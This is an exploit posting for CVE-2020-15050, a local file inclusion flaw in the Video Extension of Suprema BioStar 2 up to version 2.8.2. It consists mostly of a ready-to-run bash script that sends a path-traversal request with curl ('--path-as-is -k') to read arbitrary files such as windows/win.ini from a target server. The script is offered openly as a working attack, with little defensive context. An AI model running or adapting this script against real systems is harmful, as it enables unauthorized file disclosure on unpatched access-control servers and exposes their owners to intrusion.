Bio Star 2.8.2 Local File Inclusion

Bio Star version 2.8.2 suffers from a local file inclusion vulnerability.


MD5 | 27371df2c5b87c59458e1241e0ee2306

# Exploit Title: Bio Star 2.8.2 - Local File Inclusion
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
# Google Dork: N/A
# Date of Exploit Release: 2020-07-13
# Exploit Author: SITE Team
# Vendor Homepage: https://www.supremainc.com/en/main.asp
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
# Version: Bio Star 2, Video Extension up to version 2.8.2
# Tested on: Windows
# CVE : CVE-2020-15050


#!/bin/bash

# Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
# Google Dork: N/A
# Date of Exploit Release: 13/7/2020
# Exploit Author: SITE Team
# Vendor Homepage: https://www.supremainc.com/en/main.asp
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
# Version: Bio Star 2, Video Extension up to version 2.8.1
# Tested on: Windows
# CVE : CVE-2020-15050

echo "*********** SITE TEAM *********************"
echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********"
echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi *********************"

if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini"
echo "*******************************************"
else
args=("$@")
curl -X GET --path-as-is -k ${args[0]}${args[1]}
fi

Related Posts